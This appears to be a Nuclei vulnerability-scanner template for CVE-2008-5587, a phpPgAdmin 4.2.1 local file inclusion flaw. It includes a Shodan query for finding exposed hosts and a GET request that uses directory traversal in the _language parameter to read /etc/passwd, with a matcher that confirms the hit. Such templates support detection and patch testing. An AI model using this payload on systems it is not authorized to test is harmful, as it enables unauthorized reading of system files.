id: CVE-2008-5587 info: name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion author: dhiyaneshDK severity: medium reference: https://www.exploit-db.com/exploits/7363 tags: cve2008,lfi,phppgadmin metadata: shodan-query: 'http.title:"phpPgAdmin"' description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php." requests: - method: GET path: - '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00' matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - type: status status: - 200